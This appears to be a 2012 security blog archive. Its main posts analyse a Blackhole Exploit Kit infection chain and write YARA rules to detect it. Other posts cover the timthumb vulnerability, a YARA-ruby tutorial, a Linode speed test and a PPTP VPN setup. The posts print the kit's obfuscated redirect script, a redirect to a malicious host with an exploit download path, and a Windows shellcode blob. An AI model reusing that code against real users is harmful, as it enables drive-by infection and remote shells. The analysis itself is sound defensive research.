Friday, September 28, 2012

An Evening with Blackhole Exploit Kit v2.0 II

Continuing from the previous post, I've managed to get another link of blackhole exploit page that redirect user to load PDF exploit, and getting that PDF exploit sample really made my day (even though it is early in the morning).

The url doesn't really present as standard blackhole url parameter as its extension is .htm, but I've been informed by the source that it is marked as JS/Blacole, so why don't give it a try.

GET /osc.htm HTTP/1.0
User-Agent: LAB69/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: college.unibel.by
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300

HTTP/1.1 200 OK
Date: Thu, 27 Sep 2012 22:01:40 GMT
Server: Apache/2.2.22 (Win32)
Last-Modified: Thu, 27 Sep 2012 22:00:59 GMT
ETag: "1300000001fa44-3d9-4cab613107f95"
Accept-Ranges:  none
Content-Length: 985
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html

2012-09-27 22:05:48 URL:hxxp://college.unibel.by/osc.htm [985/985] -> "osc.htm"

The content of osc.htm looks like below.

<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>page15</title>
 </head>
 <body>

<h1><b>Please wait a moment. You will be forwarded...</h1></b>

<script>v="va"+"l";try{ebgserb++;}catch(snregrx){try{fbwenrn&&325}catch(ztbet){m=Math;ev=window[""+"e"+v];}ff="fromC"+"ha";if(020==0x10)ff+="rCode";n="134&&114&&130&&66&&77&&69&&73&&76&&26&&135&&113&&131&&66&&78&&134&&114&&130&&66&&75&&27&&121&&119&&56&&135&&113&&131&&65&&78&&77&&135&&113&&131&&66&&58&&48&&140&&116&&128&&115&&134&&125&&118&&126&&133&&62&&125&&127&&116&&113&&133&&121&&128&&126&&78&&50&&121&&132&&133&&128&&75&&63&&64&&131&&118&&115&&133&&113&&127&&132&&118&&131&&62&&136&&63&&130&&134&&74&&73&&64&&73&&64&&64&&118&&128&&130&&134&&125&&64&&124&&122&&126&&124&&131&&64&&115&&128&&124&&134&&125&&127&&62&&129&&120&&129&&50&&76&&141".split("&&");h=2;s="";if(m)for(i=0;i-107!=0;i=1+i){k=i;s+=String[ff](n[i]-(020+i%h));}if(020==0x10)ev(s);}</script>

 </body>
</html>

It is a normal obfuscation pattern for blackhole to redirect user to another page containing the exploit. By deobfuscating the javascript, I manage to get the url for redirection and consequently get the content of the url.

var1=49;
var2=var1;
if(var1==var2) {document.location="hxxp://sectantes-x.ru:8080/forum/links/column.php";}

GET /forum/links/column.php HTTP/1.0
User-Agent: LAB69/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: sectantes-x.ru:8080
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300

HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 27 Sep 2012 22:09:56 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 12306

2012-09-27 22:12:02 URL:hxxp://sectantes-x.ru:8080/forum/links/column.php [12306/12306] -> "column.php" [1]

The content of column.php is somehow human-unreadable since it was compressed with gzip compression. With a little help from php gzinflate(), I managed to get it uncompressed. Tested with my previous yara rule, it matched the signature for blackhole exploit page :)

[[email protected] analysis]# yara -r ../Blackhole_Exploit_Page.yar column.php
Blackhole2_exploit_page column.php

After deobfuscation process, I get the PluginDetect page that check for user's vulnerable version of Adobe Reader. You may find the beautified version of deobfuscated code HERE.

Unlike other PluginDetect page that I've seen, which scan the version for Adobe Reader, Flash, Java, and etc, this version of PluginDetect page is just looking only for Adobe Reader version to serve PDF exploit.

I'm quite interested with how blackhole serve PDF exploit to user after detecting Adobe Reader's version. From beautified code link I pasted above, blackhole use function x() to craft the url parameter values that redirect user to download PDF exploit.

function x(s) {
    d = [];
    for (i = 0; i < s.length; i++) {
        k = (s.charCodeAt(i) - 46).toString(16);
        if (k.length == 1) k = "0" + k;
        d.push(k);
    };
    return d.join("");
}

show_pdf2 = function (src) {
        var p = document.createElement('object');
        p.setAttribute('type', 'application/pdf');
        p.setAttribute('data', src);
        p.setAttribute('width', 1);
        p.setAttribute('height', 1);
        document.body.appendChild(p)
    };
    show_pdf2(window.location + "?cpdgszkh=" + x("89719") + "&uln=" + x("r") + "&rfor=3307093738070736060b&wjlajcro=" + x(pdfver.join(".")));

By using function x(), I managed to get full path to download the PDF exploit sample packaged with libtiff exploit.

column.php?cpdgszkh=0a0b09030b&uln=44&rfor=3307093738070736060b&wjlajcro=0b00040003

When I finished downloading the PDF sample, I was wondering whether blackhole uses the parameter value to protect the sample from easily obtained by security researcher, thus I play around with the parameter value, (1) with different value of pdfver.join(".") for wjlajcro, (2) arbitrary character, not according to the output of function x(), and all I got was the same samples that lead to libtiff exploit. And I wonder again what is the purpose of encoding the path with x(), and I got no idea.

For the PDF exploit analysis, I'll be back on the next post. Until next time, bye bye.

Thursday, September 27, 2012

An Evening with Blackhole Exploit Kit v2.0


After went back from martial art class last night, I happened to have some times to dig around with in-the-wild Blackhole Exploit Kit (BHEK) v2.0 exploit page. Unfortunately, I didn't manage to get the exploit samples since the site hosting the BHEK went down right after I deobfuscate the javascript of the exploit page.

With some limited numbers of exploit page sample (since the uptime duration for BHEK exploit page is short, maybe a hit-and-run method), I wrote yara rules to exercise on the patterns and generalization of different samples.

rule Blackhole2_exploit_page
{
        meta:
                author = "Ahmad Azizan"
                ref = "BlackHole 2.0"
                description = "BlackHole Exploit Page"
                version = "0.1"
                impact = 4
                hide = false

        strings:
                $eval1 = /window\[['"](['"]\+['"]){0,1}e(['"]\+['"]){0,1}v(['"]\+['"]){0,1}a(['"]\+['"]){0,1}l(['"]\+['"]){0,1}['"]\]/ nocase
                $eval2 = /eval\(.{1,}\);/ nocase

                $pattern1 = /getElementsByTagName/ nocase
                $pattern2 = /getElementById/ nocase
                $pattern3 = /getAttribute/ nocase

                $fcc1 = /(String.){0,1}fromCharCode/ nocase
                $fcc2 = /fromCha/ nocase
                $fcc3 = /rCode/ nocase

                $doc = /document\[\w{1,}\]\(['"].{1,}['"]\);/ nocase

                $try = /try\s{0,}\{.{1,}\}\s{0,}catch\s{0,}\(.{1,}\)\s{0,}\{/ nocase

                $machine1 = /Win/
                $machine2 = /Mac/
                $machine3 = /Linux/
                $machine4 = /FreeBSD/
                $machine5 = /iPhone/
                $machine6 = /iPod/
                $machine7 = /iPad/
                $machine8 = /Win\.\*CE/
                $machine9 = /Win\.\*Mobile/
                $machine10 = /Pocket\\\\s\*PC/

                $api1 = /Msxml2.XMLHTTP/
                $api2 = /Msxml2.DOMDocument/
                $api3 = /Microsoft.XMLDOM/
                $api4 = /ShockwaveFlash.ShockwaveFlash/
                $api5 = /TDCCtl.TDCCtl/
                $api6 = /Shell.UIHelper/
                $api7 = /Scripting.Dictionary/
                $api8 = /wmplayer.ocx/

                $plugin1 = /PluginDetect\.getVersion\(.{1,}\);/ nocase

                $type1 = /function\s{0,}x\(s\)\{d\=\[\];for\(\w{1}\=0;\w{1}<s\.length;\w{1}\+\+\)\{k\=\(s\.charCodeAt\(\w{1}\)\-\d{2}\)\.toString\(\d{2}\);if\(k\.length\=\=\d{1}\)k\=\"\d{1}\"\+k;d\.push\(k\);\};return d\.join\(\"\"\);\}/ nocase

                $type2_1 = /clsid:8AD9C840-044E-11D1-B3E9-00805F499D93/
                $type2_2 = /clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA/
                $type2_3 = /clsid:CA8A9780-280D-11CF-A24D-444553540000/
                $type2_4 = /clsid:D27CDB6E-AE6D-11CF-96B8-444553540000/
                $type2_5 = /clsid:BD96C556-65A3-11D0-983A-00C04FC29E36/
                $type2_6 = /%u[0-9a-fA-F]{4}/

        condition:

                ((($eval1 or $eval2) and (($pattern1 or $pattern2) and $pattern3) and ($fcc1 or ($fcc2 and $fcc3)) and ($doc) and ($try)) or
                (($eval1 or $eval2) and (($pattern1 or $pattern2) and $pattern3) and ($doc) and ($try)) or
                (($eval1 or $eval2) and ($fcc1 or ($fcc2 and $fcc3)) and ($try)) or
                (($eval1 or $eval2) and ($doc) and ($try)) or
                (($eval1 or $eval2) and ($try))) or
                ((all of ($machine*)) and
                (all of ($api*)) and
                ($plugin1) and
                (($type1) or (all of ($type2_*))))
}

And here are the test result:

[[email protected] analysis]# yara -r ../Blackhole_Exploit_Page.yar .
Blackhole2_exploit_page ./speedmudi-obf.orig
Blackhole2_exploit_page ./afternewvision-obf.orig
Blackhole2_exploit_page ./afternewvision-deobf.orig
Blackhole2_exploit_page ./thats_fitted-obf.orig
Blackhole2_exploit_page ./thats_fitted-deobf.orig
Blackhole2_exploit_page ./degree_deleting-obf.orig
Blackhole2_exploit_page ./degree_deleting-deobf.orig
Blackhole2_exploit_page ./mydb-obf.orig
Blackhole2_exploit_page ./mydb-deobf.orig

Monday, September 24, 2012

Timthumbs up!



Buying a ready-made wordpress theme couldn't be more easier nowadays. For us, buying a ready-made wordpress theme means helping ourselves from involving on the pain-in-the-butt tasks of designing wordpress theme from scratch.

However, some of the time, we might be a little bit unaware of list of plugins bundled with the theme. Even though it was mentioned by the theme sellers (but most of the time, not), we would care less about the version as we might see the plugins as just a small component of a big functional wordpress framework.

One of the obvious example is timthumb.php, a widely used plugin script in wordpress theme for cropping, zooming and resizing web images. Since August 2011, timthumb has known to contribute a disastrous number of compromised website. The number still increasing along with the timthumb that not-yet-to-be-patched inside the wordpress theme that not-yet-to-be-bought by unaware users.

On its earlier version (1.* - 1.32), timthumb is prone to a Remote Code Execution vulnerability, due to the script does not check remotely cached files properly. By crafting a special image file with a valid MIME-type, and appending a PHP file at the end of this, it is possible to fool timthumb into believing that it is a legitimate image, thus caching it locally in the cache directory[1]

Based on the code revision r141, we can see on line 668, the array of $allowedSites is not sanitize properly on strpos() function where attacker can craft bad website such as http://blogger.com.lab69.com/pocfile.php to make timthumb think it is one of the allowed sites to include in the content. On code revision r143, a simple patch of '/' at the end of allowed site fix the problem.

If you happened to buy an old wordpress theme (which also bundled with vulnerable timthumb), it is a good procedure to update the timthumb to the latest version on its repository. You can start by install a wordpress plugin called Timthumb Vulnerability Scanner to scan the existing timthumb and its version on your wordpress directory and inform you whether it is out-of-date and require update.


Credit:
http://www.exploit-db.com/exploits/17602/
http://timthumb.googlecode.com/svn/trunk/timthumb.php
http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/

Friday, September 21, 2012

Having fun with yara and ruby


YARA is a tool aimed at helping malware researchers to identify and classify malware samples. With YARA you can create descriptions of malware families based on textual or binary patterns contained on samples of those families. Each description consists of a set of strings and a Boolean expression which determines its logic. (Source: http://code.google.com/p/yara-project/)

Installation

Initiate the installation process by installing ruby, gems, and pcre
yum install ruby ruby-devel rubygems pcre pcre-devel

Download and install YARA
wget http://yara-project.googlecode.com/files/yara-1.6.tar.gz
tar -xvf yara-1.6.tar.gz
cd yara-1.6
./configure
make
sudo make install

Install yara-ruby
gem install yara

Note: If you got an error such as "yada yada libyara.so.0: cannot open shared object file: No such file or directory yada yada" when you try to run your yara ruby application, you should add the path /usr/local/lib to the loader configuration file
sudo echo "/usr/local/lib" >> /etc/ld.so.conf
sudo ldconfig

Code

This is a sample code from yara-ruby to test the PE rule.
#!/usr/bin/env ruby
#
# Usage example:
#   ruby ispe.rb /win_c/windows/system32/*.???
#
#    yara-ruby - Ruby bindings for the yara malware analysis library.
#    Eric Monti
#    Copyright (C) 2011 Trustwave Holdings
#
#    This program is free software: you can redistribute it and/or modify it
#    under the terms of the GNU General Public License as published by the
#    Free Software Foundation, either version 3 of the License, or (at your
#    option) any later version.
#
#    This program is distributed in the hope that it will be useful, but
#    WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
#    or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
#    for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program. If not, see <http://www.gnu.org/licenses/>.
#

$: << File.join(File.dirname(__FILE__), '..', 'lib')
require 'rubygems'
require 'yara'

ctx = Yara::Rules.new

ctx.compile_string "rule IsPE { condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 }"

ARGV.each do |fname|
  ctx.scan_file(fname).each {|match| puts ">> #{fname} matched #{match.rule} rule" }
end

Shellcode

Below are the sample shellcode that we'll use to test the above PE rule. You can convert the shellcode to exe at this website, http://sandsprite.com/shellcode_2_exe.php
%u6afc%u4deb%uf9e8%uffff%u60ff%u6c8b%u2424%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u2824%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u2c03%u898b%u246c%u611c%u31c3%u64db%u438b%u8b30%u0c40%u708b%uad1c%u408b%u5e08%u8e68%u0e4e%u50ec%ud6ff%u5366%u6866%u3233%u7768%u3273%u545f%ud0ff%ucb68%ufced%u503b%ud6ff%u895f%u66e5%ued81%u0208%u6a55%uff02%u68d0%u09d9%uadf5%uff57%u53d6%u5353%u4353%u4353%uff53%u68d0%ubeca%u2455%u6866%u611e%u5366%ue189%u6895%uf9ec%u60aa%uff57%u6ad6%u5110%uff55%u66d0%u646a%u6866%u6d63%u506a%u2959%u89cc%u6ae7%u8944%u31e2%uf3c0%u95aa%ufd89%u42fe%ufe2d%u2c42%u7a8d%uab38%uabab%u7268%ub3fe%uff16%u2875%ud6ff%u575b%u5152%u5151%u016a%u5151%u5155%ud0ff%uad68%u05d9%u53ce%ud6ff%uff6a%u37ff%ud0ff%ue768%uc679%uff79%u0475%ud6ff%u77ff%ufffc%u68d0%uceef%u60e0%uff53%uffd6%u41d0

Testing

With the code and shellcode above, we can test the IsPE rule as a proof-of-concept on how brilliant YARA detect a file based on a rule given
[[email protected] yara]# ruby test.rb shellcode.exe_
>> shellcode.exe_ matched IsPE rule
[[email protected] yara]#

Credit:
http://code.google.com/p/yara-project/
https://github.com/SpiderLabs/yara-ruby

Wednesday, September 19, 2012

Linode Speedtest in Malaysia


If you want to try an offshore VPS, Linode is one of the best value. With a great support team, cool control panel, and not to mention, hassle-free resizing process, Linode has made VPS renting as easy as ABC.

Linode currently have 6 datacenter location which located at, Tokyo, London, Newark, Atlanta, Dallas, and Fremont. As to do speedtest for all of their datacenter, Linode provide a speedtest page for customer to evaluate the speedtest for themselves.

As for me, my main concern for an offshore datacenter is speed. Because most of the time, the clients are located in Malaysia and it will have a frequent contact with the host (VPS).

I know that location is the most important aspect for connection speed, the near we are to the datacenter, the faster connection we'll get. But just to get some quantitative analysis (lol), so I did a bit of a speed evaluation for all the Linode datacenters:

--2012-09-20 05:08:16--  http://speedtest.tokyo.linode.com/100MB-tokyo.bin
Resolving speedtest.tokyo.linode.com... 106.187.96.148, 2400:8900::4b
Connecting to speedtest.tokyo.linode.com|106.187.96.148|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 104857600 (100M) [application/octet-stream]
Saving to: `100MB-tokyo.bin'

100%[=========================>] 104,857,600  855K/s   in 2m 30s

2012-09-20 05:10:47 (682 KB/s) - `100MB-tokyo.bin' saved [104857600/104857600]

--2012-09-20 05:14:34--  http://speedtest.london.linode.com/100MB-london.bin
Resolving speedtest.london.linode.com... 176.58.107.39, 2a01:7e00::4b
Connecting to speedtest.london.linode.com|176.58.107.39|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 104857600 (100M) [application/octet-stream]
Saving to: `100MB-london.bin'

100%[=========================>] 104,857,600  200K/s   in 2m 53s

2012-09-20 05:17:30 (590 KB/s) - `100MB-london.bin' saved [104857600/104857600]

--2012-09-20 05:27:31--  http://speedtest.newark.linode.com/100MB-newark.bin
Resolving speedtest.newark.linode.com... 50.116.57.237, 2600:3c03::4b
Connecting to speedtest.newark.linode.com|50.116.57.237|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 104857600 (100M) [application/octet-stream]
Saving to: `100MB-newark.bin'

100%[=========================>]104,857,600  943K/s   in 2m 23s

2012-09-20 05:29:55 (716 KB/s) - `100MB-newark.bin' saved [104857600/104857600]

--2012-09-20 05:33:56--  http://speedtest.atlanta.linode.com/100MB-atlanta.bin
Resolving speedtest.atlanta.linode.com... 50.116.39.117, 2600:3c02::4b
Connecting to speedtest.atlanta.linode.com|50.116.39.117|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 104857600 (100M) [application/octet-stream]
Saving to: `100MB-atlanta.bin'

100%[=========================>]104,857,600  924K/s   in 2m 53s

2012-09-20 05:36:50 (593 KB/s) - `100MB-atlanta.bin' saved [104857600/104857600]

--2012-09-20 05:37:00--  http://speedtest.dallas.linode.com/100MB-dallas.bin
Resolving speedtest.dallas.linode.com... 50.116.25.154, 2600:3c00::4b
Connecting to speedtest.dallas.linode.com|50.116.25.154|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 104857600 (100M) [application/octet-stream]
Saving to: `100MB-dallas.bin'

100%[=========================>]104,857,600  540K/s   in 3m 9s

2012-09-20 05:40:10 (541 KB/s) - `100MB-dallas.bin' saved [104857600/104857600]

--2012-09-20 05:11:00--  http://speedtest.fremont.linode.com/100MB-fremont.bin
Resolving speedtest.fremont.linode.com... 50.116.14.9, 2600:3c01::4b
Connecting to speedtest.fremont.linode.com|50.116.14.9|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 104857600 (100M) [application/octet-stream]
Saving to: `100MB-fremont.bin'

100%[=========================>] 104,857,600  247K/s   in 3m 26s

2012-09-20 05:14:27 (498 KB/s) - `100MB-fremont.bin' saved [104857600/104857600]

It seems that Newark datacenter is a bit faster than Tokyo, even though Tokyo is nearest to Malaysia. Since my current Linode VPS is located in Tokyo datacenter, maybe I can give Newark a try. With incredibly fast support by Linode, I don't think changing datacenter will be a nuclear-reactor-migration-process.

More information on changing between Linode datacenter, refer here.

Tuesday, September 18, 2012

VPN + iPhone

Using VPN connection to access Internet through your smartphone is a bit secure than usual, especially on a public wifi. It will encapsulate the data transfers between your smartphone from/to the Internet without other people can intervene the connection on LAN.

Other than getting a secure connectivity, users tend to use VPN to hide their original IP, to access blocked websites, and to bypass mobile data limit quota.

There are many different classifications, implementations, and uses for VPN, but in this write-up, I'll explain a bit on how to implement PPTP with iPhone on a CentOS server.

VPN Installation (CentOS)

Make sure pptp and ppp is not installed/uninstalled
yum remove -y pptpd ppp

Flush all NAT POSTROUTING and FORWARD iptables rules
iptables --flush POSTROUTING --table nat
iptables --flush FORWARD

Delete existing pptpd.conf and ppp directory
rm -rf /etc/pptpd.conf
rm -rf /etc/ppp

Download the required packages to install PPTP
wget http://www.diahosting.com/dload/dkms-2.0.17.5-1.noarch.rpm
wget http://www.diahosting.com/dload/kernel_ppp_mppe-1.0.2-3dkms.noarch.rpm
wget http://www.diahosting.com/dload/pptpd-1.3.4-1.rhel5.1.i386.rpm
wget http://www.diahosting.com/dload/ppp-2.4.4-9.0.rhel5.i386.rpm

Install packages and dependencies
yum -y install make libpcap iptables gcc-c++ logrotate tar cpio perl pam tcp_wrappers
rpm -ivh dkms-2.0.17.5-1.noarch.rpm
rpm -ivh kernel_ppp_mppe-1.0.2-3dkms.noarch.rpm
rpm -qa kernel_ppp_mppe
rpm -Uvh ppp-2.4.4-9.0.rhel5.i386.rpm
rpm -ivh pptpd-1.3.4-1.rhel5.1.i386.rpm

Enable IP Forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

Configure pptpd.conf for local and remote ip
echo "localip 10.0.0.1" >> /etc/pptpd.conf
echo "remoteip 10.0.0.2-254" >> /etc/pptpd.conf

Configure options.pptpd for DNS server
echo "ms-dns 8.8.8.8" >> /etc/ppp/options.pptpd
echo "ms-dns 8.8.4.4" >> /etc/ppp/options.pptpd

Adding user for VPN connection
echo "myvpnusername pptpd myvpnpassword *" >> /etc/ppp/chap-secrets

Allow IP Masquerading in iptables
iptables -t nat -A POSTROUTING -s 10.0.0.0/24 -j SNAT --to-source `ifconfig  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk 'NR==1 {print $1}'`
iptables -A FORWARD -p tcp --syn -s 10.0.0.0/24 -j TCPMSS --set-mss 1356
service iptables save
service iptables restart

Turn on pptpd service on start-up
chkconfig pptpd on

Reboot the server. When the server is back online, you can create VPN connection based on username and password you inserted on /etc/ppp/chap-secrets

Connecting to VPN server via iPhone

Tap Settings icon and tap on VPN tab. If there is no VPN tab, scroll down a bit and tap on General tab and then Network tab.


On VPN screen, tap on "Add VPN Configuration"


On "Add Configuration" screen, tap on PPTP, and insert your vpn settings.
Description: Your VPN description
Server: Your VPN IP or hostname
Account: Your VPN username
Password: Your VPN password
Send All Traffic: On


When done entering the VPN details, tap on "Save". Then tap on "On" to connect to your VPN server.


Once your VPN connection has established, you can see a small VPN icon on top of your screen.


Credit: Rockia